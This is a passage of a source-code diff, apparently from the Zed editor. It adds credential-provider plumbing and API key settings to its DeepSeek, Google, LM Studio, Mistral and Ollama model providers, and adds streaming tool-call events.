= if message.role == Role::User { + !text.trim().is_empty() + } else { + !text.is_empty() + }; + + if should_add { + messages.push(match message.role { + Role::User => deepseek::RequestMessage::User { content: text }, + Role::Assistant => deepseek::RequestMessage::Assistant { + content: Some(text), + tool_calls: Vec::new(), + reasoning_content: current_reasoning.take(), + }, + Role::System => deepseek::RequestMessage::System { content: text }, + }); + } + } MessageContent::Thinking { text, .. } => { // Accumulate reasoning content for next assistant message current_reasoning.get_or_insert_default().push_str(&text); @@ -441,7 +478,9 @@ impl DeepSeekEventMapper { }; let mut events = Vec::new(); - if let Some(content) = choice.delta.content.clone() { + if let Some(content) = choice.delta.content.clone() + && !content.is_empty() + { events.push(Ok(LanguageModelCompletionEvent::Text(content))); } @@ -469,6 +508,23 @@ impl DeepSeekEventMapper { entry.arguments.push_str(&arguments); } } + + if !entry.id.is_empty() && !entry.name.is_empty() { + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + events.push(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: entry.id.clone().into(), + name: entry.name.as_str().into(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: None, + }, + ))); + } + } } } diff --git a/crates/language_models/src/provider/google.rs b/crates/language_models/src/provider/google.rs index 334a5cbe64e6cdefbaa7c15c309ca4632109e323..244f7835a85ff67f0c4826321910ea13516371cb 100644 --- a/crates/language_models/src/provider/google.rs +++ b/crates/language_models/src/provider/google.rs @@ -1,5 +1,6 @@ use anyhow::{Context as _, Result}; use collections::BTreeMap; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture}; use google_ai::{ FunctionDeclaration, GenerateContentResponse, GoogleModelMode, Part, SystemInstruction, @@ -13,9 +14,9 @@ use language_model::{ LanguageModelToolUse, LanguageModelToolUseId, MessageContent, StopReason, }; use language_model::{ - IconOrSvg, LanguageModel, LanguageModelId, LanguageModelName, LanguageModelProvider, - LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, - LanguageModelRequest, RateLimiter, Role, + GOOGLE_PROVIDER_ID, GOOGLE_PROVIDER_NAME, IconOrSvg, LanguageModel, LanguageModelId, + LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, + LanguageModelProviderState, LanguageModelRequest, RateLimiter, Role, }; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; @@ -33,8 +34,8 @@ use util::ResultExt; use language_model::ApiKeyState; -const PROVIDER_ID: LanguageModelProviderId = language_model::GOOGLE_PROVIDER_ID; -const PROVIDER_NAME: LanguageModelProviderName = language_model::GOOGLE_PROVIDER_NAME; +const PROVIDER_ID: LanguageModelProviderId = GOOGLE_PROVIDER_ID; +const PROVIDER_NAME: LanguageModelProviderName = GOOGLE_PROVIDER_NAME; #[derive(Default, Clone, Debug, PartialEq)] pub struct GoogleSettings { @@ -60,6 +61,7 @@ pub struct GoogleLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } const GEMINI_API_KEY_VAR_NAME: &str = "GEMINI_API_KEY"; @@ -76,30 +78,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = GoogleLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = GoogleLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl GoogleLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); diff --git a/crates/language_models/src/provider/lmstudio.rs b/crates/language_models/src/provider/lmstudio.rs index 9af8559c722d1fe726f7f871c9863cd85a3d2678..0d60fef16791087e35bac7d846b2ec99821d5470 100644 --- a/crates/language_models/src/provider/lmstudio.rs +++ b/crates/language_models/src/provider/lmstudio.rs @@ -1,26 +1,31 @@ use anyhow::{Result, anyhow}; use collections::HashMap; +use credentials_provider::CredentialsProvider; +use fs::Fs; use futures::Stream; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, Subscription, Task}; +use gpui::{AnyView, App, AsyncApp, Context, CursorStyle, Entity, Subscription, Task}; use http_client::HttpClient; use language_model::{ - AuthenticateError, LanguageModelCompletionError, LanguageModelCompletionEvent, - LanguageModelToolChoice, LanguageModelToolResultContent, LanguageModelToolUse, MessageContent, - StopReason, TokenUsage, + ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, + LanguageModelCompletionEvent, LanguageModelToolChoice, LanguageModelToolResultContent, + LanguageModelToolUse, MessageContent, StopReason, TokenUsage, env_var, }; use language_model::{ - IconOrSvg, LanguageModel, LanguageModelId, LanguageModelName, LanguageModelProvider, - LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, - LanguageModelRequest, RateLimiter, Role, + LanguageModelId, LanguageModelName, LanguageModelProvider, LanguageModelProviderId, + LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, RateLimiter, Role, }; -use lmstudio::{ModelType, get_models}; +use lmstudio::{LMSTUDIO_API_URL, ModelType, get_models}; + pub use settings::LmStudioAvailableModel as AvailableModel; -use settings::{Settings, SettingsStore}; +use settings::{Settings, SettingsStore, update_settings_file}; use std::pin::Pin; +use std::sync::LazyLock; use std::{collections::BTreeMap, sync::Arc}; -use ui::{ButtonLike, Indicator, List, ListBulletItem, prelude::*}; -use util::ResultExt; +use ui::{ + ButtonLike, ConfiguredApiCard, ElevationIndex, List, ListBulletItem, Tooltip, prelude::*, +}; +use ui_input::InputField; use crate::AllLanguageModelSettings; use crate::provider::util::parse_tool_arguments; @@ -32,6 +37,9 @@ const LMSTUDIO_SITE: &str = "https://lmstudio.ai/"; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("lmstudio"); const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("LM Studio"); +const API_KEY_ENV_VAR_NAME: &str = "LMSTUDIO_API_KEY"; +static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); + #[derive(Default, Debug, Clone, PartialEq)] pub struct LmStudioSettings { pub api_url: String, @@ -44,6 +52,8 @@ pub struct LmStudioLanguageModelProvider { } pub struct State { + api_key_state: ApiKeyState, + credentials_provider: Arc, http_client: Arc, available_models: Vec, fetch_model_task: Option>>, @@ -55,14 +65,30 @@ impl State { !self.available_models.is_empty() } + fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); + let api_url = LmStudioLanguageModelProvider::api_url(cx).into(); + let task = self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); + self.restart_fetch_models_task(cx); + task + } + fn fetch_models(&mut self, cx: &mut Context) -> Task> { let settings = &AllLanguageModelSettings::get_global(cx).lmstudio; let http_client = self.http_client.clone(); let api_url = settings.api_url.clone(); + let api_key = self.api_key_state.key(&api_url); // As a proxy for the server being "authenticated", we'll check if its up by fetching the models cx.spawn(async move |this, cx| { - let models = get_models(http_client.as_ref(), &api_url, None).await?; + let models = + get_models(http_client.as_ref(), &api_url, api_key.as_deref(), None).await?; let mut models: Vec = models .into_iter() @@ -95,6 +121,15 @@ impl State { } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); + let api_url = LmStudioLanguageModelProvider::api_url(cx).into(); + let _task = self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); + if self.is_authenticated() { return Task::ready(Ok(())); } @@ -128,16 +163,29 @@ impl State { } impl LmStudioLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let this = Self { http_client: http_client.clone(), state: cx.new(|cx| { let subscription = cx.observe_global::({ let mut settings = AllLanguageModelSettings::get_global(cx).lmstudio.clone(); move |this: &mut State, cx| { - let new_settings = &AllLanguageModelSettings::get_global(cx).lmstudio; - if &settings != new_settings { - settings = new_settings.clone(); + let new_settings = + AllLanguageModelSettings::get_global(cx).lmstudio.clone(); + if settings != new_settings { + let credentials_provider = this.credentials_provider.clone(); + let api_url = Self::api_url(cx).into(); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); + settings = new_settings; this.restart_fetch_models_task(cx); cx.notify(); } @@ -145,6 +193,11 @@ impl LmStudioLanguageModelProvider { }); State { + api_key_state: ApiKeyState::new( + Self::api_url(cx).into(), + (*API_KEY_ENV_VAR).clone(), + ), + credentials_provider, http_client, available_models: Default::default(), fetch_model_task: None, @@ -156,6 +209,17 @@ impl LmStudioLanguageModelProvider { .update(cx, |state, cx| state.restart_fetch_models_task(cx)); this } + + fn api_url(cx: &App) -> String { + AllLanguageModelSettings::get_global(cx) + .lmstudio + .api_url + .clone() + } + + fn has_custom_url(cx: &App) -> bool { + Self::api_url(cx) != LMSTUDIO_API_URL + } } impl LanguageModelProviderState for LmStudioLanguageModelProvider { @@ -225,6 +289,7 @@ impl LanguageModelProvider for LmStudioLanguageModelProvider { model, http_client: self.http_client.clone(), request_limiter: RateLimiter::new(4), + state: self.state.clone(), }) as Arc }) .collect() @@ -244,12 +309,13 @@ impl LanguageModelProvider for LmStudioLanguageModelProvider { _window: &mut Window, cx: &mut App, ) -> AnyView { - let state = self.state.clone(); - cx.new(|cx| ConfigurationView::new(state, cx)).into() + cx.new(|cx| ConfigurationView::new(self.state.clone(), _window, cx)) + .into() } fn reset_credentials(&self, cx: &mut App) -> Task> { - self.state.update(cx, |state, cx| state.fetch_models(cx)) + self.state + .update(cx, |state, cx| state.set_api_key(None, cx)) } } @@ -258,6 +324,7 @@ pub struct LmStudioLanguageModel { model: lmstudio::Model, http_client: Arc, request_limiter: RateLimiter, + state: Entity, } impl LmStudioLanguageModel { @@ -376,15 +443,20 @@ impl LmStudioLanguageModel { Result>>, > { let http_client = self.http_client.clone(); - let api_url = cx.update(|cx| { - let settings = &AllLanguageModelSettings::get_global(cx).lmstudio; - settings.api_url.clone() + let (api_key, api_url) = self.state.read_with(cx, |state, cx| { + let api_url = LmStudioLanguageModelProvider::api_url(cx); + (state.api_key_state.key(&api_url), api_url) }); let future = self.request_limiter.stream(async move { - let request = lmstudio::stream_chat_completion(http_client.as_ref(), &api_url, request); - let response = request.await?; - Ok(response) + let stream = lmstudio::stream_chat_completion( + http_client.as_ref(), + &api_url, + api_key.as_deref(), + request, + ) + .await?; + Ok(stream) }); async move { Ok(future.await?.boxed()) }.boxed() @@ -634,37 +706,196 @@ fn add_message_content_part( struct ConfigurationView { state: Entity, - loading_models_task: Option>, + api_key_editor: Entity, + api_url_editor: Entity, } impl ConfigurationView { - pub fn new(state: Entity, cx: &mut Context) -> Self { - let loading_models_task = Some(cx.spawn({ - let state = state.clone(); - async move |this, cx| { - state - .update(cx, |state, cx| state.authenticate(cx)) - .await - .log_err(); - - this.update(cx, |this, cx| { - this.loading_models_task = None; - cx.notify(); - }) - .log_err(); - } - })); + pub fn new(state: Entity, _window: &mut Window, cx: &mut Context) -> Self { + let api_key_editor = cx.new(|cx| InputField::new(_window, cx, "sk-...").label("API key")); + + let api_url_editor = cx.new(|cx| { + let input = InputField::new(_window, cx, LMSTUDIO_API_URL).label("API URL"); + input.set_text(&LmStudioLanguageModelProvider::api_url(cx), _window, cx); + input + }); + + cx.observe(&state, |_, _, cx| { + cx.notify(); + }) + .detach(); Self { state, - loading_models_task, + api_key_editor, + api_url_editor, + } + } + + fn retry_connection(&mut self, _window: &mut Window, cx: &mut Context) { + let has_api_url = LmStudioLanguageModelProvider::has_custom_url(cx); + let has_api_key = self + .state + .read_with(cx, |state, _| state.api_key_state.has_key()); + if !has_api_url { + self.save_api_url(cx); + } + if !has_api_key { + self.save_api_key(&Default::default(), _window, cx); } + + self.state.update(cx, |state, cx| { + state.restart_fetch_models_task(cx); + }); } - fn retry_connection(&self, cx: &mut App) { + fn save_api_key(&mut self, _: &menu::Confirm, _window: &mut Window, cx: &mut Context) { + let api_key = self.api_key_editor.read(cx).text(cx).trim().to_string(); + if api_key.is_empty() { + return; + } + + self.api_key_editor + .update(cx, |input, cx| input.set_text("", _window, cx)); + + let state = self.state.clone(); + cx.spawn_in(_window, async move |_, cx| { + state + .update(cx, |state, cx| state.set_api_key(Some(api_key), cx)) + .await + }) + .detach_and_log_err(cx); + } + + fn reset_api_key(&mut self, _window: &mut Window, cx: &mut Context) { + self.api_key_editor + .update(cx, |input, cx| input.set_text("", _window, cx)); + + let state = self.state.clone(); + cx.spawn_in(_window, async move |_, cx| { + state + .update(cx, |state, cx| state.set_api_key(None, cx)) + .await + }) + .detach_and_log_err(cx); + + cx.notify(); + } + + fn save_api_url(&self, cx: &mut Context) { + let api_url = self.api_url_editor.read(cx).text(cx).trim().to_string(); + let current_url = LmStudioLanguageModelProvider::api_url(cx); + if !api_url.is_empty() && &api_url != ¤t_url { + self.state + .update(cx, |state, cx| state.set_api_key(None, cx)) + .detach_and_log_err(cx); + + let fs = ::global(cx); + update_settings_file(fs, cx, move |settings, _| { + settings + .language_models + .get_or_insert_default() + .lmstudio + .get_or_insert_default() + .api_url = Some(api_url); + }); + } + } + + fn reset_api_url(&mut self, _window: &mut Window, cx: &mut Context) { + self.api_url_editor + .update(cx, |input, cx| input.set_text("", _window, cx)); + + // Clear API key when URL changes since keys are URL-specific self.state - .update(cx, |state, cx| state.fetch_models(cx)) + .update(cx, |state, cx| state.set_api_key(None, cx)) .detach_and_log_err(cx); + + let fs = ::global(cx); + update_settings_file(fs, cx, |settings, _cx| { + if let Some(settings) = settings + .language_models + .as_mut() + .and_then(|models| models.lmstudio.as_mut()) + { + settings.api_url = Some(LMSTUDIO_API_URL.into()); + } + }); + cx.notify(); + } + + fn render_api_url_editor(&self, cx: &Context) -> impl IntoElement { + let api_url = LmStudioLanguageModelProvider::api_url(cx); + let custom_api_url_set = api_url != LMSTUDIO_API_URL; + + if custom_api_url_set { + h_flex() + .p_3() + .justify_between() + .rounded_md() + .border_1() + .border_color(cx.theme().colors().border) + .bg(cx.theme().colors().elevated_surface_background) + .child( + h_flex() + .gap_2() + .child(Icon::new(IconName::Check).color(Color::Success)) + .child(v_flex().gap_1().child(Label::new(api_url))), + ) + .child( + Button::new("reset-api-url", "Reset API URL") + .label_size(LabelSize::Small) + .start_icon(Icon::new(IconName::Undo).size(IconSize::Small)) + .layer(ElevationIndex::ModalSurface) + .on_click( + cx.listener(|this, _, _window, cx| this.reset_api_url(_window, cx)), + ), + ) + .into_any_element() + } else { + v_flex() + .on_action(cx.listener(|this, _: &menu::Confirm, _window, cx| { + this.save_api_url(cx); + cx.notify(); + })) + .gap_2() + .child(self.api_url_editor.clone()) + .into_any_element() + } + } + + fn render_api_key_editor(&self, cx: &Context) -> impl IntoElement { + let state = self.state.read(cx); + let env_var_set = state.api_key_state.is_from_env_var(); + let configured_card_label = if env_var_set { + format!("API key set in {API_KEY_ENV_VAR_NAME} environment variable.") + } else { + "API key configured".to_string() + }; + + if !state.api_key_state.has_key() { + v_flex() + .on_action(cx.listener(Self::save_api_key)) + .child(self.api_key_editor.clone()) + .child( + Label::new(format!( + "You can also set the {API_KEY_ENV_VAR_NAME} environment variable and restart Zed." + )) + .size(LabelSize::Small) + .color(Color::Muted), + ) + .into_any_element() + } else { + ConfiguredApiCard::new(configured_card_label) + .disabled(env_var_set) + .on_click(cx.listener(|this, _, _window, cx| this.reset_api_key(_window, cx))) + .when(env_var_set, |this| { + this.tooltip_label(format!( + "To reset your API key, unset the {API_KEY_ENV_VAR_NAME} environment variable." + )) + }) + .into_any_element() + } } } @@ -672,15 +903,13 @@ impl Render for ConfigurationView { fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { let is_authenticated = self.state.read(cx).is_authenticated(); - let lmstudio_intro = "Run local LLMs like Llama, Phi, and Qwen."; - - if self.loading_models_task.is_some() { - div().child(Label::new("Loading models...")).into_any() - } else { - v_flex() - .gap_2() - .child( - v_flex().gap_1().child(Label::new(lmstudio_intro)).child( + v_flex() + .gap_2() + .child( + v_flex() + .gap_1() + .child(Label::new("Run local LLMs like Llama, Phi, and Qwen.")) + .child( List::new() .child(ListBulletItem::new( "LM Studio needs to be running with at least one model downloaded.", @@ -690,86 +919,106 @@ impl Render for ConfigurationView { .child(Label::new("To get your first model, try running")) .child(Label::new("lms get qwen2.5-coder-7b").inline_code(cx)), ), - ), - ) - .child( - h_flex() - .w_full() - .justify_between() - .gap_2() - .child( - h_flex() - .w_full() - .gap_2() - .map(|this| { - if is_authenticated { - this.child( - Button::new("lmstudio-site", "LM Studio") - .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .on_click(move |_, _window, cx| { - cx.open_url(LMSTUDIO_SITE) - }) - .into_any_element(), - ) - } else { - this.child( - Button::new( - "download_lmstudio_button", - "Download LM Studio", - ) + ) + .child(Label::new( + "Alternatively, you can connect to an LM Studio server by specifying its \ + URL and API key (may not be required):", + )), + ) + .child(self.render_api_url_editor(cx)) + .child(self.render_api_key_editor(cx)) + .child( + h_flex() + .w_full() + .justify_between() + .gap_2() + .child( + h_flex() + .w_full() + .gap_2() + .map(|this| { + if is_authenticated { + this.child( + Button::new("lmstudio-site", "LM Studio") .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, _window, cx| { - cx.open_url(LMSTUDIO_DOWNLOAD_URL) + cx.open_url(LMSTUDIO_SITE) }) .into_any_element(), + ) + } else { + this.child( + Button::new( + "download_lmstudio_button", + "Download LM Studio", ) - } - }) - .child( - Button::new("view-models", "Model Catalog") .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, _window, cx| { - cx.open_url(LMSTUDIO_CATALOG_URL) - }), - ), - ) - .map(|this| { - if is_authenticated { - this.child( - ButtonLike::new("connected") - .disabled(true) - .cursor_style(gpui::CursorStyle::Arrow) - .child( - h_flex() - .gap_2() - .child(Indicator::dot().color(Color::Success)) - .child(Label::new("Connected")) - .into_any_element(), - ), - ) - } else { - this.child( - Button::new("retry_lmstudio_models", "Connect") - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon(IconName::PlayFilled) - .on_click(cx.listener(move |this, _, _window, cx| { - this.retry_connection(cx) - })), - ) - } - }), - ) - .into_any() - } + cx.open_url(LMSTUDIO_DOWNLOAD_URL) + }) + .into_any_element(), + ) + } + }) + .child( + Button::new("view-models", "Model Catalog") + .style(ButtonStyle::Subtle) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) + .on_click(move |_, _window, cx| { + cx.open_url(LMSTUDIO_CATALOG_URL) + }), + ), + ) + .map(|this| { + if is_authenticated { + this.child( + ButtonLike::new("connected") + .disabled(true) + .cursor_style(CursorStyle::Arrow) + .child( + h_flex() + .gap_2() + .child(Icon::new(IconName::Check).color(Color::Success)) + .child(Label::new("Connected")) + .into_any_element(), + ) + .child( + IconButton::new("refresh-models", IconName::RotateCcw) + .tooltip(Tooltip::text("Refresh Models")) + .on_click(cx.listener(|this, _, _window, cx| { + this.state.update(cx, |state, _| { + state.available_models.clear(); + }); + this.retry_connection(_window, cx); + })), + ), + ) + } else { + this.child( + Button::new("retry_lmstudio_models", "Connect") + .start_icon( + Icon::new(IconName::PlayFilled).size(IconSize::XSmall), + ) + .on_click(cx.listener(move |this, _, _window, cx| { + this.retry_connection(_window, cx) + })), + ) + } + }), + ) } } diff --git a/crates/language_models/src/provider/mistral.rs b/crates/language_models/src/provider/mistral.rs index 02d46dcaa7ce7acc76d85c93cad610a7d2489bf0..4cd1375fe50cd792a3a7bc8c85ba7b5b5af9520a 100644 --- a/crates/language_models/src/provider/mistral.rs +++ b/crates/language_models/src/provider/mistral.rs @@ -1,5 +1,6 @@ use anyhow::{Result, anyhow}; use collections::BTreeMap; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture, stream::BoxStream}; use gpui::{AnyView, App, AsyncApp, Context, Entity, Global, SharedString, Task, Window}; @@ -22,7 +23,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; use ui_input::InputField; use util::ResultExt; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("mistral"); const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("Mistral"); @@ -43,6 +44,7 @@ pub struct MistralLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -51,15 +53,26 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = MistralLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = MistralLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } @@ -73,20 +86,30 @@ impl MistralLanguageModelProvider { .map(|this| &this.0) } - pub fn global(http_client: Arc, cx: &mut App) -> Arc { + pub fn global( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Arc { if let Some(this) = cx.try_global::() { return this.0.clone(); } let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -280,6 +303,10 @@ impl LanguageModel for MistralLanguageModel { self.model.supports_tools() } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_tool_choice(&self, _choice: LanguageModelToolChoice) -> bool { self.model.supports_tools() } @@ -508,6 +535,13 @@ pub fn into_mistral( model: model.id().to_string(), messages, stream, + stream_options: if stream { + Some(mistral::StreamOptions { + stream_tool_calls: Some(true), + }) + } else { + None + }, max_tokens: max_output_tokens, temperature: request.temperature, response_format: None, @@ -616,12 +650,16 @@ impl MistralEventMapper { for tool_call in tool_calls { let entry = self.tool_calls_by_index.entry(tool_call.index).or_default(); - if let Some(tool_id) = tool_call.id.clone() { + if let Some(tool_id) = tool_call.id.clone() + && !tool_id.is_empty() + { entry.id = tool_id; } if let Some(function) = tool_call.function.as_ref() { - if let Some(name) = function.name.clone() { + if let Some(name) = function.name.clone() + && !name.is_empty() + { entry.name = name; } @@ -629,6 +667,23 @@ impl MistralEventMapper { entry.arguments.push_str(&arguments); } } + + if !entry.id.is_empty() && !entry.name.is_empty() { + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + events.push(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: entry.id.clone().into(), + name: entry.name.as_str().into(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: None, + }, + ))); + } + } } } diff --git a/crates/language_models/src/provider/ollama.rs b/crates/language_models/src/provider/ollama.rs index 96343ec060e13ff4e63bbdf96db3b2501e32a461..49c326683a225bf73f604a584307ea1316a710c4 100644 --- a/crates/language_models/src/provider/ollama.rs +++ b/crates/language_models/src/provider/ollama.rs @@ -1,4 +1,5 @@ use anyhow::{Result, anyhow}; +use credentials_provider::CredentialsProvider; use fs::Fs; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; use futures::{Stream, TryFutureExt, stream}; @@ -54,6 +55,7 @@ pub struct OllamaLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, http_client: Arc, fetched_models: Vec, fetch_model_task: Option>>, @@ -65,10 +67,15 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OllamaLanguageModelProvider::api_url(cx); - let task = self - .api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx); + let task = self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); self.fetched_models.clear(); cx.spawn(async move |this, cx| { @@ -80,10 +87,14 @@ impl State { } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OllamaLanguageModelProvider::api_url(cx); - let task = self - .api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx); + let task = self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); // Always try to fetch models - if no API key is needed (local Ollama), it will work // If API key is needed and provided, it will work @@ -157,7 +168,11 @@ impl State { } impl OllamaLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let this = Self { http_client: http_client.clone(), state: cx.new(|cx| { @@ -170,6 +185,14 @@ impl OllamaLanguageModelProvider { let url_changed = last_settings.api_url != current_settings.api_url; last_settings = current_settings.clone(); if url_changed { + let credentials_provider = this.credentials_provider.clone(); + let api_url = Self::api_url(cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); this.fetched_models.clear(); this.authenticate(cx).detach(); } @@ -184,6 +207,7 @@ impl OllamaLanguageModelProvider { fetched_models: Default::default(), fetch_model_task: None, api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }), }; @@ -400,7 +424,14 @@ impl OllamaLanguageModel { stream: true, options: Some(ChatOptions { num_ctx: Some(self.model.max_tokens), - stop: Some(request.stop), + // Only send stop tokens if explicitly provided. When empty/None, + // Ollama will use the model's default stop tokens from its Modelfile. + // Sending an empty array would override and disable the defaults. + stop: if request.stop.is_empty() { + None + } else { + Some(request.stop) + }, temperature: request.temperature.or(Some(1.0)), ..Default::default() }), @@ -858,9 +889,7 @@ impl ConfigurationView { .child( Button::new("reset-context-window", "Reset") .label_size(LabelSize::Small) - .icon(IconName::Undo) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) + .start_icon(Icon::new(IconName::Undo).size(IconSize::Small)) .layer(ElevationIndex::ModalSurface) .on_click( cx.listener(|this, _, window, cx| { @@ -905,9 +934,7 @@ impl ConfigurationView { .child( Button::new("reset-api-url", "Reset API URL") .label_size(LabelSize::Small) - .icon(IconName::Undo) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) + .start_icon(Icon::new(IconName::Undo).size(IconSize::Small)) .layer(ElevationIndex::ModalSurface) .on_click( cx.listener(|this, _, window, cx| this.reset_api_url(window, cx)), @@ -949,9 +976,11 @@ impl Render for ConfigurationView { this.child( Button::new("ollama-site", "Ollama") .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .on_click(move |_, _, cx| cx.open_url(OLLAMA_SITE)) .into_any_element(), ) @@ -959,9 +988,11 @@ impl Render for ConfigurationView { this.child( Button::new("download_ollama_button", "Download Ollama") .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .on_click(move |_, _, cx| { cx.open_url(OLLAMA_DOWNLOAD_URL) }) @@ -972,9 +1003,11 @@ impl Render for ConfigurationView { .child( Button::new("view-models", "View All Models") .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .on_click(move |_, 